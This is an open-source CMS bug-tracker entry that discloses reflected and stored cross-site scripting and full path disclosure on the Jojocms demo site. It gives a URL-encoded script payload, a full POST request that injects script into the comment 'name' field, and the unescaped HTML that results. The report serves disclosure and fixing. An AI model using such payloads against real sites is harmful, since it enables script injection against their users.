Jojocms

Welcome to the Jojocms project! We hope that Jojocms provides you with many hours of increased productivity. If you have any issues, this is the place to name them. For general Questions or Beginners help please visit http://www.jojocms.org/forums/.

link to this task | email this task | Tasklist

PR1#134 - XSS & FPD

Attached to Project: Jojocms
Opened by seth (seth) - Wednesday, 05 November 2008, 12:52 UTC+13:00
Category Not specified
Due date Not specified
Due in Version Not specified
Operating System Not specified
Priority High
Reported version Not specified
Severity
Status Not specified
Task Type Bug Report
State Open
Assigned To No-one
Percent Complete
Votes 0
Private No

Details

Cross site scripting (non-persistent) and Full path disclosure:

http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E

Cross site scripting (persistent):

http://demo.jojocms.org/blog/1/welcome-to-jojocms/


HTTP HEADERS (I injected in 'name' variable):

POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E

RESULT:

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>

sorry, my english is not good :(

This task depends upon

Loading...